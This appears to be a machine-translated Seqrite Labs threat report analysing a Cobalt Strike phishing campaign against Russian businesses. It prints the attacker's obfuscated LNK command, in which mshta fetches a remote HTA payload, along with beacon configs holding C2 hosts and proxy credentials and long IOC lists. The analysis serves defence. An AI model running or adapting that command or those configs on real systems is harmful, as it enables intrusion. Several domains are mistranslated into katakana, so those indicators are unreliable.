• 製品とサービス
        • クラウド

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • オンプレミス

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • ディーラー&卸売

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • サイバーセキュリティと Data Privacy Awareness
  • ソリューション
    • 金融・保険
    • 教育支援
    • 政府・公共機関向け
    • 健康
    • ITeS
    • 製造業
  • 会社
    • 学校区概要 Seqrite
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • Partners
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • 資料
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • 理解する Data Privacy
    • リスクスコアを確認する
    • DPDP対話
    • プライバシーアワー
Seqrite ラボ Blog
営業担当者へ連絡 攻撃を受けているのか?
  • 製品とサービス
        • クラウド

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • オンプレミス

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • ディーラー&卸売

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • サイバーセキュリティと Data Privacy Awareness
  • ソリューション
    • 金融・保険
    • 教育支援
    • 政府・公共機関向け
    • 健康
    • ITeS
    • 製造業
  • 会社
    • 学校区概要 Seqrite
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • Partners
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • 資料
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • 理解する Data Privacy
    • リスクスコアを確認する
    • DPDP対話
    • プライバシーアワー
ホーム  /  技術部門  / オペレーション・フロストビーコン:ロシアを標的としたマルチクラスターコバルト攻撃キャンペーン
オペレーション・フロストビーコン:ロシアを標的としたマルチクラスターコバルト攻撃キャンペーン
08 12月 2025

オペレーション・フロストビーコン:ロシアを標的としたマルチクラスターコバルト攻撃キャンペーン

著者 ラヤパティ・ラクシュミ・プラサンナ・サイ
ラヤパティ・ラクシュミ・プラサンナ・サイ
技術部門

オペレーション・フロストビーコン:ロシアを標的としたマルチクラスターコバルト攻撃キャンペーン

Contents

  • イントロダクション
  • 主なターゲット
    • 地理的焦点
    • 影響を受ける業界
  • LNKクラスター
    • 初期アクセス: アーカイブ配信
    • フィッシングメールとおとり
    • 悪意のあるLNKおよびHTAローダー
    • 難読化された PowerShell ペイロード
  • CVEクラスター
    • フィッシングメール
    • CVEの連鎖
  • インフラストラクチャとアトリビューション
  • 結論
  • Seqrite 保護性能
  • IOC
  • MITRE TTP
  • 著者

イントロダクション

Seqrite ラボは、ロシア連邦内の企業にCobalt Strikeビーコンを配信する、Operation FrostBeaconとして追跡されている標的型マルウェアキャンペーンを特定しました。フィッシングメールは、この脅威グループが金銭目的で、支払い、契約、照合、法的リスクを担当する組織を標的にしていることを示しています。20を超える初期感染ファイルが確認されており、侵入は2つの異なるクラスターを持つ多層感染チェーンに依存しています。1つは悪意のあるショートカットファイルを含むフィッシングアーカイブファイルを介して感染します。2つ目のクラスターは、古いCVE-2017-0199テンプレートインジェクション脆弱性を悪用し、さらに別の古い数式エディタの脆弱性CVE-2017-11882と連鎖させています。

どちらのクラスタも、リモートHTA実行をトリガーして難読化されたPowerShellローダーを起動します。このローダーはメモリ内でシェルコードを復号・実行することができ、Cobalt Strikeの展開につながります。攻撃者のエコシステムは、コマンドアンドコントロールエンドポイントとして設定された複数のロシア管理ドメインと、カスタマイズされたCobalt Strikeの柔軟なプロファイルを利用しています。各クラスタ内では複数の感染チェーンが観測されており、今年に入って複数の研究者によって実際に確認されたものもいくつかあります。このブログでは、複数のクラスタからの感染ワークフロー、ペイロードとともに追跡された関連インフラストラクチャ、そして攻撃者が使用する手法について、包括的な分析を提供します。

主なターゲット

地理的焦点

  • ロシア連邦

影響を受ける業界

物流、工業生産、建設、技術供給を専門とするB2B企業。

  • 財務部門
  • 法務部門
  • 企業情報メールボックス

LNKクラスター

初期アクセス: アーカイブ配信

感染チェーンは、フィッシングメールの添付ファイルによるアーカイブの配布から始まります。

 

ファイル名: рекламация.zip

MD5 : 7096141a5b480e793e9a890b84ebaee2更新日時: 2025-11-05 23:15:22初確認日時: 2025-11-06 00:08:46 UTC (ロシア)

名前、タイムスタンプ、および最初に確認されたテレメトリデータから、地理的な焦点が明確であり、このキャンペーンはロシア連邦のユーザーを直接ターゲットにしていることがわかります。ZIPファイルには2つのコンポーネントが含まれています。

  1. おとりのExcelワークブック 正当に見えるように意図された
  2. 悪意のあるLNKファイル PDF文書を装う

フィッシングメールとおとり

アーカイブファイル「рекламация」のロシア語ファイル名に基づいて、フィッシングメールが含まれていなかったため、同様の初期感染ファイルをさらに探しました。その結果、合計5つのファイルと、さらにいくつかの感染チェーン、そして興味深いメールが見つかりました。

ある感染チェーンでは、以下の画像に示すように、「Kristina.Yasnova@art[.]cse[.]ru」というメールIDから送信されたフィッシングメールが確認されています。RARアーカイブには、同様の方法でデコイファイルとショートカットファイルが含まれています。

これらのメールは、契約金の支払い、法的紛争、債権回収、仲裁、および取引の照合依頼に関するものです。これは、B2B決済や長期契約が一般的な業界では典型的なものです。この戦術は、攻撃者が被害者が馴染みのある文書名、特に母国語で書かれた文書名を信頼することを利用するソーシャルエンジニアリングキャンペーンと一致しています。「сводная」という単語は、物流、財務、報告の文脈でよく使われる要約/統合シートに翻訳されます。一部のアーカイブファイルには、開かれていない文書がありますが、これらは照合明細書ではなく血圧トラッカーを示すおとりのように見えます。

 

悪意のあるLNKおよびHTAローダー

ファイル名: рекламация.pdf.lnk
MD5: 16ae36df5bee92d8c4cae8e17583a2c9

 

LNKファイルは、二重拡張子形式によってPDF文書に見せかけるように偽装されています。ファイル名「рекламация」は「クレーム/苦情」を意味し、これもまたビジネス向けのメール詐欺によく使われる手法です。ユーザーがファイルをダブルクリックすると、cmd.exeを介して以下のコマンドが実行されます。

· /c powershell -WindowStyle Hidden -Command m^s^h^t^a^ ^h^t^t^p^s^:^/^/^e^z^s^t^a^t^.^r^u^/^f^l^o^w^e^r^s^f^o^r^l^o^v^e^.^g^i^f

実行チェーンには、いくつかの明確な悪意のある動作が見られます。PowerShellは非表示ウィンドウモードで起動し、ユーザーに警告するプロンプトが表示されないようになっています。攻撃者は、文字レベルの難読化(m^s^h^t^a)によってmshta.exeを起動し、単純な検出を回避しています。実行直後、スクリプトはリモートURLにアクセスして次の段階のペイロードを取得します。LNKファイルはローカルの偽ドキュメントを一切開かないため、感染はバックグラウンドで静かに進行します。LNKファイル内のURLは次のとおりです。

  • hxxps://ezstat[.]ru/flowersforlove.gif

 

このリソースはGIF画像のように見えますが、リダイレクタまたはローダーステージとして機能します。mshta.exeがアクセスすると、サーバーは実際の悪意のあるコンポーネントを配信することで応答します。

· hxxps://valisi[.]ru/dosing.hta

HTAファイルは、攻撃の初期段階における主要な実行コンポーネントとして機能し、mshta.exeを介してWindowsの完全なスクリプト権限を利用することで、制限のないサイレントスクリプト実行を可能にします。

 

HTAがトリガーされると、複数のBase64エンコードされたブロックをgzip圧縮されたPowerShellスクリプトに再構成し、次の段階のペイロード配信環境を準備し、埋め込みロジックを通じて実行を開始します。これらの階層化されたエンコードにより、難読化が実現し、静的分析が阻害され、早期検知を回避しながら攻撃チェーンがスムーズに進行します。

難読化された PowerShell ペイロード

PowerShellの最終段階では、いくつかの重要な機能が実行されます。3層の難読化シーケンスが実装されており、各ステップは悪意のあるロジックの露出を意図的に遅らせるように設計されています。第1層は、MemoryStream内に埋め込まれたgzip圧縮されたBase64文字列です。これをデコードして解凍すると、第2段階のPowerShellスクリプトが生成されます。このスクリプトには、主に2つの機能が含まれています。

  • func_get_proc_address: .NET内部クラスMicrosoft.Win32.UnsafeNativeMethods、特にそのメソッドを悪用して、管理されていないWindows APIアドレスを動的に解決します。 モジュールハンドルの取得 (NAIST) と GetProcAddress.
  • func_get_delegate_type: System.Reflection.Emit を使用してランタイム デリゲート型を構築し、関数ポインターをマネージ デリゲートとして実行できるようにします。

それらの役割は、完全なメモリ内実行フレームワークを構築し、呼び出し宣言なしで、またディスクに成果物を書き込むことなく、ローダーが API を呼び出せるようにすることです。

この第2段階のスクリプトの中には、第3層にして最終層である、変数$v_codeに格納されたBase64エンコードされたデータブロックが含まれています。デコード後、スクリプトはキー35とのバイト単位のXOR演算を実行します。これにより、生のシェルコードバッファが生成され、その後、スクリプトはRWX割り当ての正しいパラメータ(割り当てタイプ0x3000、保護フラグ0x40)を使用してVirtualAllocで実行可能メモリを割り当てます。

復号化されたシェルコードは、動的に生成された関数ポインタを介してコピーされ、実行されます。この最終的なシェルコードは、Cobalt Strike Beaconローダーであり、多段階のファイルレス実行チェーンを完成させます。圧縮、ネストされたBase64、XORエンコーディング、動的API解決、およびメモリ内直接実行の組み合わせは、AMSIを回避し、EDR計測をバイパスし、ディスクベースの検出を完全に回避するために設計された現代の攻撃手法と一致しています。

この逆アセンブリは、マルウェアビーコンでよく見られるWindows x86シェルコードです。PEBをトラバースし、kernel32.dllを検索し、エクスポートされた関数名をROR-13アルゴリズムでハッシュ化することで、インポートなしでWin32 APIを動的に解決するリフレクションローダーを実装しています。これは、LoadLibraryA、GetProcAddress、VirtualAlloc、WinInet関数、その他のシステムコールへのポインタを取得するためです。

API セットを解決した後、wininet.dllをロードし、偽装されたヘッダーと jQuery ファイルに似たパス文字列を使用して通常の Web トラフィックを装った HTTP ベースのコマンド アンド コントロール チャネルを確立し、RWX メモリを割り当て、セカンダリ ペイロードをチャンク単位でダウンロードし、割り当てられた領域に書き込み、実行を新しく受信したコードに転送します。機能的には、これはリモート コマンド実行、ペイロード配信、および侵害されたホストの永続的な制御のために設計されたステージング マルウェア ビーコンとなります。ステージング構成は次のとおりです。

{'CobaltStrikeStager': {'raw': [{'netloc': 'update.ecols.ru', 'path': '/jquery-3.3.1.slim.min.js', 'port': 8443, 'headers': {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9, / ;q=0.8′, 'Accept-Language': 'en-US,en;q=0.5', 'Referer': ' http://code.jquery.com/' , 'Accept-Encoding': 'gzip, deflate', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'}, 'inet_flags': ['INTERNET_FLAG_RELOAD', 'INTERNET_FLAG_NO_CACHE_WRITE', 'INTERNET_FLAG_SECURE', 'INTERNET_FLAG_KEEP_CONNECTION', 'INTERNET_FLAG_IGNORE_CERT_DATE_INVALID', 'INTERNET_FLAG_IGNORE_CERT_CN_INVALID', 'INTERNET_FLAG_NO_UI'], 'watermark': 987654321, 'type': 'HTTPS'}]}} {“Headers”: “Accept: text/html,application/xhtml+xml,application/xml;q=0.9, / ;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: hxxp://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n”, “Type”: “Metasploit Download”, “URL”: “hxxp://update.ecols.ru/jquery-3.3.1.slim.min.js”}

この部分は、JS CDNダウンロードを装ったCobalt Strikeステージャーを表しています。これは、ステルスHTTP(S)経由でペイロードを取得し、Webトラフィックに紛れ込もうとする第一段階のローダーに典型的なものです。以下の設定は、より詳細なプロファイル、つまり完全に構成されたHTTPSビーコンを示しています。重要な詳細は以下の通りです。

  • ペイロード難読化のためのBase64-URLデコードとXORを含む後処理
  • ハードコードされたプロキシと資格情報
  • プロセスインジェクションはNtMapViewOfSectionを使用します

{‘CobaltStrikeBeacon’: {‘raw’: [{‘BeaconType’: [‘HTTPS’], ‘Port’: 8443, ‘SleepTime’: 45000, ‘MaxGetSize’: 2801745, ‘Jitter’: 37, ‘MaxDNS’: ‘Not Found’, ‘PublicKey’: ‘30819f300d06092a864886f70d010101050003818d003081890281810084fcb90f0cb2f1dbe9de6913412e0a42fedd862c395c36c63006921d1eb5fe2860296e99283284318e84109d27ec8a17146ef21241c8012ec2ccd553b61663454d369b35189df81c8b0636513c4e9d97850e675bc3fb888bff30af985a21e5564f55c5be5275010d9b874f2a06b001ade04a3b5274bdacc1e6b8e239338f1165020301000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000’, ‘C2Server’: ‘update.ecols.ru,/jquery-3.3.1.min.js’, ‘UserAgent’: ‘Not Found’, ‘HttpPostUri’: ‘/jquery-3.3.2.min.js’, ‘Malleable_C2_Instructions’: [‘Remove 1522 bytes from the end’, ‘Remove 84 bytes from the beginning’, ‘Remove 3931 bytes from the beginning’, ‘Base64 URL-safe decode’, ‘XOR mask w/ random key’], ‘HttpGet_Metadata’: ‘Not Found’, ‘HttpPost_Metadata’: ‘Not Found’, ‘SpawnTo’: ‘00000000000000000000000000000000’, ‘PipeName’: ‘Not Found’, ‘DNS_Idle’: ‘Not Found’, ‘DNS_Sleep’: ‘Not Found’, ‘SSH_Host’: ‘Not Found’, ‘SSH_Port’: ‘Not Found’, ‘SSH_Username’: ‘Not Found’, ‘SSH_Password_Plaintext’: ‘Not Found’, ‘SSH_Password_Pubkey’: ‘Not Found’, ‘HttpGet_Verb’: ‘GET’, ‘HttpPost_Verb’: ‘POST’, ‘HttpPostChunk’: 0, ‘Spawnto_x86’: ‘%windir%\syswow64\dllhost.exe’, ‘Spawnto_x64’: ‘%windir%\sysnative\dllhost.exe’, ‘CryptoScheme’: 0, ‘Proxy_Config’: ‘hxxp://45.147.14.106:62900’, ‘Proxy_User’: ‘MxvNcQHY’, ‘Proxy_Password’: ‘3uuN9iwg’, ‘Proxy_Behavior’: ‘Use proxy server’, ‘Watermark’: 987654321, ‘bStageCleanup’: ‘False’, ‘bCFGCaution’: ‘False’, ‘KillDate’: 0, ‘bProcInject_StartRWX’: ‘False’, ‘bProcInject_UseRWX’: ‘False’, ‘bProcInject_MinAllocSize’: 17500, ‘ProcInject_PrependAppend_x86’: [‘9090’, ”], ‘ProcInject_PrependAppend_x64’: [‘9090’, ”], ‘ProcInject_Execute’: [‘ntdll:RtlUserThreadStart’, ‘CreateThread’, ‘NtQueueApcThread-s’, ‘CreateRemoteThread’, ‘RtlCreateUserThread’], ‘ProcInject_AllocationMethod’: ‘NtMapViewOfSection’, ‘bUsesCookies’: ‘True’, ‘HostHeader’: ”}]}} {“BeaconType”: [“HTTPS”], “Port”: 8443, “SleepTime”: 45000, “MaxGetSize”: 2801745, “Jitter”: 37, “C2Server”: “update.ecols.ru,/jquery-3.3.1.min.js”, “HttpPostUri”: “/jquery-3.3.2.min.js”, “Malleable_C2_Instructions”: [“Remove 1522 bytes from the end”, “Remove 84 bytes from the beginning”, “Remove 3931 bytes from the beginning”, “Base64 URL-safe decode”, “XOR mask w/ random key”], “HttpGet_Verb”: “GET”, “HttpPost_Verb”: “POST”, “HttpPostChunk”: 0, “Spawnto_x86”: “%windir%\syswow64\dllhost.exe”, “Spawnto_x64”: “%windir%\sysnative\dllhost.exe”, “CryptoScheme”: 0, “Proxy_Config”: “hxxp://45.147.14.106:62900”, “Proxy_User”: “MxvNcQHY”, “Proxy_Password”: “3uuN9iwg”, “Proxy_Behavior”: “Use proxy server”, “Watermark”: 987654321, “bStageCleanup”: “False”, “bCFGCaution”: “False”, “KillDate”: 0, “bProcInject_StartRWX”: “False”, “bProcInject_UseRWX”: “False”, “bProcInject_MinAllocSize”: 17500, “ProcInject_PrependAppend_x86”: [“kJA=”, “Empty”], “ProcInject_PrependAppend_x64”: [“kJA=”, “Empty”], “ProcInject_Execute”: [“ntdll:RtlUserThreadStart”, “CreateThread”, “NtQueueApcThread-s”, “CreateRemoteThread”, “RtlCreateUserThread”], “ProcInject_AllocationMethod”: “NtMapViewOfSection”, “bUsesCookies”: “True”, “HostHeader”: “”}

PowerShell 経由で MSHTA プロセスをトリガーし、最終的にメモリ内でシェルコードをデコードしてロードし、Cobalt Strike ビーコンを展開する、さまざまなドメインとステージャーのセットを使用する同様の感染ファイルがさらに確認されました。

CVEクラスター

2つ目のクラスターでは、フィッシング添付ファイルとしてDOCXファイルが送信されていることも確認されました。これは、一般的なCVE-2017-0199の脆弱性を悪用し、数式エディタを起動してリモートHTAファイルの実行を誘発するものです。

フィッシングメール

今回のフィッシングメールは、債務返済の法的要求を装っています。2025年3月14日までに支払いが行われない場合、ハバロフスク仲裁裁判所に延滞金(罰金と利息を含む)の回収を求める申し立てを行うと記載されています。メッセージには、契約書と思しき具体的な条項が引用されており、署名・認証済みの和解合意書と原本を法的住所に郵送し、メールのやり取りの記録を保持するよう要求されています。

同様の構成の別のメールでは、異なる支払期限と法的地域が挙げられています。契約書に基づき、支払いは銀行振込の日付をもって承認されると記載され、銀行口座情報を含む詳細な署名欄で締めくくられています。

同様のメールがさらに確認されており、手動または自動で再利用された大量フィッシングテンプレートが明確に示されています。悪意のあるドキュメント添付ファイルрекламация.docx内の word/settings.xml.rels ファイルには、以下に示すように、 aquacomplect[.]ruでホストされている外部テンプレートを参照する attachedTemplate 関係が含まれていました。

この構成により、Microsoft Word はドキュメントの初期化中にリモート テンプレートを要求して読み込みます。このような外部参照テンプレートは、 CVE-2017-0199に関連付けられた悪用手法と一致しており、攻撃者はマクロを必要とせずに、リモート URL を埋め込んでセカンダリ ペイロード (一般的には HTA またはスクリプト ベースのマルウェア) を配信します。したがって、 aquacomplect.ruドメインの存在は、ドキュメントが感染チェーンの一部としてリモート テンプレート インジェクションを使用していることを裏付けています。あるチェーンでは、埋め込みマクロまたは OLE オブジェクトを介した悪用ペイロードを含む RTF ファイルをダウンロードする 16 進数形式でエンコードされた HTML エンティティを特定しました。

CVEの連鎖

ほとんどの連鎖において、ドキュメントが数式エディタの別の古い脆弱性CVE-2017-11882を悪用するRTFファイルをダウンロードしていることが確認されました。何年も経った今でも、脅威アクターはパッチ適用後も依然としてこの脆弱性を悪用しようと試みています。これらの脆弱性は、CVE-2017-0199が配信に利用され、CVE-2017-11882はCobalt StrikeにつながるLNKクラスタに類似したリダイレクト後のリモートHTAファイルの実行に利用されるなど、同様の連鎖が実環境で確認されています。

2025年においても、SideWinderはこれらの特定のCVEを連鎖させ、南アジア(スリランカ、バングラデシュ、パキスタン)の高レベルの政府機関を標的とし、CVE-2017-0199とCVE-2017-11882の両方を悪用する悪意のあるWord/RTFファイルを初期感染ベクターとして使用した。

インフラストラクチャとアトリビューション

最終的なビーコンをダウンロードするCobalt Strikeステージャー「update[.]ecols[.]ru」のURLに基​​づいて、類似のものを検索し、次のクエリを使用して40以上のURLを特定しました。

これにより、類似のアーカイブファイルと文書ファイル、そしてロシア語で書かれた複数のデコイファイルを用いた追加キャンペーンが発見されました。観測されたドメインはすべてロシアのプロバイダーに登録されており、作成日の詳細は以下に記載されています。

ドメイン 作成日 レコード
incident.zilab[.]ru 2015-11-15T09:46:56Z RU-CENTER-RU
mcnn[.]ru 2004-10-18T20:00:00Z R01-RU
order.edrennikov[.]ru 2007-08-26T20:00:00Z RU-CENTER-RU
cba.abc92[.]ru 1999-10-26T15:07:24Z RU-CENTER-RU
法医学[.]jwork[.]ru 2009-05-06T20:00:00Z RD-RU
ホストbynet[.]ru 2017-04-09T21:43:46Z R01-RU
moscable77[.]ru 2019-03-26T11:32:10Z れぐるる
gk-stst[.]ru 2023-01-12T05:38:27Z REGTIME-RU
アクアコンプレクト[.]ru 2016-02-26T15:47:04Z れぐるる
ezstat[.]ru 2011-01-13T13:41:30Z RU-CENTER-RU
ekostroy33[.]ru 2020-10-14T07:22:13Z R01-RU
ヴァリシ[.]ル 2016-03-11T10:14:40Z れぐるる
bsprofi[.]ru 2010-12-29T11:51:35Z REGTIME-RU
イプリス[.]ru 2011-01-15T19:15:01Z RU-CENTER-RU
ゼタグ[.]ru 2015-12-18T09:47:12Z RD-RU
リエリ[.]ル 2020-03-04T15:48:22Z れぐるる
投与ポンプ[.]ru 2015-04-03T08:57:01Z RD-RU
esetnod64[.]ru 2023-08-14T16:38:10Z れぐるる
ヤドロ[.]ル 2000-12-19T21:00:00Z RU-CENTER-RU
iplogger[.]ru 2011-01-22T04:15:13Z RU-CENTER-RU
krona77[.]ru 2018-12-19T11:06:01Z ベゲット・ル
bti25[.]ru 2022-12-10T06:57:06Z ベゲット・ル
emec[.]su 2015-06-05T16:01:05Z RD-SU
ジェムコッティ[.]ru 2016-02-02T20:21:38Z れぐるる

分析の結果、フィッシングメールの内容と標的から判断すると、攻撃者はロシア語を話す金銭目的のサイバー犯罪グループであると判断しました。世界中の金融機関を標的としたコバルトグループと、攻撃手法(TTP)や標的設定に重複が見られましたが、今回の「オペレーション・フロストビーコン」で使用された特定のマルウェアファミリーは確認されていません。

結論

Seqrite Labsは、ロシアのB2B企業、特に財務部門と法務部門を標的としたマルチクラスター攻撃キャンペーンを分析しました。Operation FrostBeaconとして追跡されているこの金銭目的のサイバー犯罪グループは、悪意のあるDOCXファイルと武器化されたZIPアーカイブという2つの並行した配信経路を使用しており、どちらも最終的には同じ目標、つまりCobalt Strike Beaconのメモリ内展開に収束します。

最初の感染経路では、脅威アクターはCVE-2017-0199を悪用するWord文書を配布し、これがCVE-2017-11882に連鎖しています。これとは対照的に、2番目の感染経路では、ショートカットファイルを含む悪意のあるアーカイブが配信されます。どちらの経路も、ロシアのドメインにリダイレクトされた後、リモートHTAファイルの実行につながり、多層構造のPowerShellローダーが起動されます。ローダーは3層のエンコードを使用してシェルコードを実行し、ステージャーをダウンロードして正規のプロセスにインジェクションを行い、最終的にCobalt Strikeをステルス的に展開します。

Seqrite 保護性能

  • lnk.trojan.1762957461
  • トロイの木馬A18583779
  • lnk.trojan.1742297824
  • トロイの木馬.スクリプト.38976
  • ジェネリックPMF.S30570383

IOC

アーカイブ
7096141a5b480e793e9a890b84ebaee2 рекламация.zip
833aa0a39625a4014c3c019ecf06a577 рекламация.rar
8ddcc3d272dd6b926d5c439a59198b51 договор.rar
58f1700e70ea49c0c520429fae09391b (RAR)
メールアドレス
c088e4f9875bf4df552e418a54c4ce07 クリスティーナ・ヤスノヴァ@art.cse[.]ru
7261fc5b42cc63ae34f520fc8f3ef5a4 kornilova@impex-him[.]ru
c088e4f9875bf4df552e418a54c4ce07 クリスティーナ・ヤスノヴァ@art.cse[.]ru
8f60ad980885ff0000f6a9d29ce95376 asrogov@kzst45[.]ru
5facd6d79a20249fd58c29f9dc98dfe2 asrogov@kzst45[.]ru
bbd10ee2ff2488faa297593e79df4512 karina@toolhaus[.]ru
456289209b90d09e54a1a439e3fe5248 karina@toolhaus[.]ru
7340c916254e31e0dbb7fcec7a89cfb0 yakovleva@effectovent[.]ru
8ba9f38456557e58bf4613b363298d55 yakovleva@effectovent[.]ru
08fc33687a6158dd15aa72e631905e10 yakovleva@effectovent[.]ru
48d588add63a0373ec896da4ee59b79e buh@toolhaus[.]ru
LNK
16ae36df5bee92d8c4cae8e17583a2c9 рекламация.pdf.lnk
eb0516a78fa169ab0867cb9b98136357 рекламация.pdf.lnk
16e9c51f60b629257140cb6ffc7a36ec рекламация.pdf.lnk
f16417878356a08f840dac7f03461b5d акт сверки.xls.lnk
5e51ff594c46170ef278d1c18cded7d0 Договор.pdf.lnk / досудебное.pdf.lnk
ドキュメント
ff96714b6e31e362e7acce7338f30cf0 рекламация.docx
f3a4176a981e50d76b8e4716400e86f2 рекламация.docx
0e1aa36d57416bac883e11f5860348cc рекламация.doc
adf61ffa03806b954450c8954fb976c7 рекламация.doc
94b800809107fb2ef6ec640ff1e0fb51 рекламация.doc
6d4691e3262d4271f76b14a9ea511ca5 претензия.docx
dfb56174c5ec2d0d8d82eb4b5ebf4f38 требование_19.03.docx
8d0821b0bb290beb156ad836237cff05 досудебное.doc
f9026fabfb8d131863ad06fd72eb2717 исковое_19.03.docx
5461a16272491f8e8b460c687d3436a6 претензия.doc
5667aa62833dd6ebd15da40130ab963d рекламация_исх_05.04.24.doc.doc
55bcc275baaae11ab634c03a9de36557 シロ.doc
dcad3be881d072240b4c5c601e562ed2 キツネ.docx / アクア.docx
a02f62d86f127b2547beac11420165fa reklamatsiia.doc
5efb844fefdbd92ccab34a5ec135ecac tmppzd1p0zv.docx
30517af2afba9baf55941c250cfd8a0f トランプ.rtf
cdfb407a0b894f5b4a6108273b81d864 ロジスタ.rtf
98f21aabbf9a76d762813d6c0ec8c876 最初の.rtf
600aeffa4395c00be2958fd8dd5135a8 ゴーゴー.rtf
2e8a01026b5c298a9b1d2519241f0b16 openai.rtf
582f7f2c93b6e14fb6c14a9b3ad09a83 bg.rtf
ef854d4cb12974fc702d10b403b3ef0b ケア.rtf
c1f40aeaf0606255920a3b82e80b64cc (RTF)
ac558fd07ffa0d6831d523b8af8ac80b (RTF)
c1f40aeaf0606255920a3b82e80b64cc (RTF)
6b8d22221e7c0dbcde24bc687a7dd6cd (RTF)
a5bc486ca38160ae9f54650d790d9684 (RTF)
ba8a950edf8c1414a978d9a4111343e2 (DOCX)
HTA
020829a48c813d34aa68bcda4695144e 投与.hta
74f23f2e1e9d209d0961bbf6ff74dafe やあ。
2516898e2cb2cb1dca166bc69b7379c2 複雑な.hta
adef76d41463df53283588622c5e48e3 min.hta
dcdc1bad9fb1c049b7f28afa7dc8712a z.hta
a20f54df1e75c661d6670447d74ce6f7 (HTA)
976649b232d3525dd239f7139a65dd92 ロジスタ
9e5488696f4c5bf354e2e94775d9277c 利益.hta
7059cd5ff17c2983ee6f33053d501ab3 中国
835f3661ef77bc4c083f6da9b11c6e5e nciki.hta
594d802ceebb1042101ffafa3e98caa6 ミダ.hta
8bddf8880ab3c631abd3ca452924d556 ゲイズ.hta
コバルトストライクステージャー/ビーコン
f87227dad7bedf66bf1a1b97aa36bf62
2c18c78ec584c5d2d045c9ab94774ad7
395da66bee080c943e820b4e61e50de6
315bcab1a9cbfe0b5b24676c2016a9cc
4ac75939c482d5c30637d56a379835f1
feae3d231a354882bb0f70889cc69a74

URLは

トリガー
hxxps://ezstat.ru/flowersforlove.gif
hxxps://yip.su/txttxt.jpg
hxxps://ezstat.ru/txttx.txt
hxxps://iplis.ru/lovers.jpeg
hxxps://iplis.ru/tramp.jpg
hxxps://iplis.ru/laydowngrenade.jpeg
hxxps://iplogger.cn/forensicsas.png
hxxps://iplis.ru/penises.jpg
hxxps://ezstat.ru/kissmyass.gif
hxxps://iplis.ru/camorra.gif
hxxps://yip.su/ncikigovru.gif
hxxps://valisi.ru/dosing.hta
hxxp://canature.su/ya.hta
hxxp://aquacomplect.ru/complex.hta
hxxps://bsprofi.ru/min.hta
hxxp://zetag.ru/z.hta
hxxp://vlasta-s.ru/logista.hta
hxxp://ecols.ru/ecols.hta
hxxp://zetag.ru/z.hta
hxxps://bsprofi.ru/profit.hta
hxxp://dosingpumps.ru/nciki.hta
hxxps://yip.su/certgovrufuck.gif
hxxp://zetag.ru/siro.doc
hxxp://zetag.ru/tramp.rtf
hxxp://aquacomplect.ru/aqua.docx
hxxp://clack.su/fox.docx
hxxp://vlasta-s.ru/logista.rtf
hxxp://valisi.ru/first.rtf
hxxp://ecols.ru/gogo.rtf
hxxp://bti25.ru/openai.rtf
hxxp://bti25.ru/china.hta
hxxp://gemme-cotti.ru/mida.hta
hxxp://xn--e1ajbcejcefx.xn--p1ai/sflopytrgjklhfaseri
hxxp://emec.su/bg.rtf
hxxp://gemme-cotti.ru/cotti.docx
hxxp://gemme-cotti.ru/zibaba.hta
hxxps://ipgrabber.ru/penis.gif
hxxps://iplogger.ru/sugar.png
hxxp://ship-care.com/care.rtf
hxxp://krona77.ru/edr.hta
hxxps://update.ecols.ru:8443/jquery-3.3.1.slim.min.js
hxxps://incident.zilab.ru:8443/jquery-3.3.1.slim.min.js
hxxps://mcnn.ru:8443/jquery-3.3.1.slim.min.js
hxxp://poopy.aarkhipov.ru:8080/jquery-3.3.1.slim.min.js
hxxps://ekostroy33.ru/jquery-3.3.2.min.js
hxxp://order.edrennikov.ru/jquery-3.3.1.min.js
hxxps://cba.abc92.ru:8443/jquery-3.3.1.slim.min.js
hxxps://moscable77.ru:8443/jquery-3.3.1.slim.min.js
hxxp://forensics.jwork.ru/jquery-3.3.1.slim.min.js

ドメイン

更新.ecols[.]ru

incident.zilab[.]ru

mcnn[.]ru

order.edrennikov[.]ru

cba.abc92[.]ru

forensics.jwork[.]ru

ホストbynet[.]ru

moscable77[.]ru

gk-stst[.]ru

アクアコンプレクト[.]ru

ezstat[.]ru

ekostroy33[.]ru

ヴァリシ[.]ル

bsprofi[.]ru

イプリス[.]ru

ゼタグ[.]ru

リエリ[.]ル

投与ポンプ[.]ru

esetnod64[.]ru

ヤドロ[.]ル

iplogger[.]ru

krona77[.]ru

bti25[.]ru

プロキシIP

45.147.14.106:62900 AS 49505 (JSC Selectel) RU
45.145.91.164:64830 AS 49505 (JSC Selectel) RU

MITRE TTP

戦略 テクニックID 技術
初期アクセス T1566.001 スピアフィッシング添付ファイル
実行 T1204.002 ユーザーの実行:悪意のあるファイル
実行 T1221 テンプレートインジェクション
実行 T1059.003 コマンド&スクリプトインタープリター: PowerShell
防衛回避 T1027 難読化/暗号化されたファイルまたは情報
防衛回避 T1140 ファイルまたは情報の難読化/デコード
防衛回避 T1055 プロセス射出
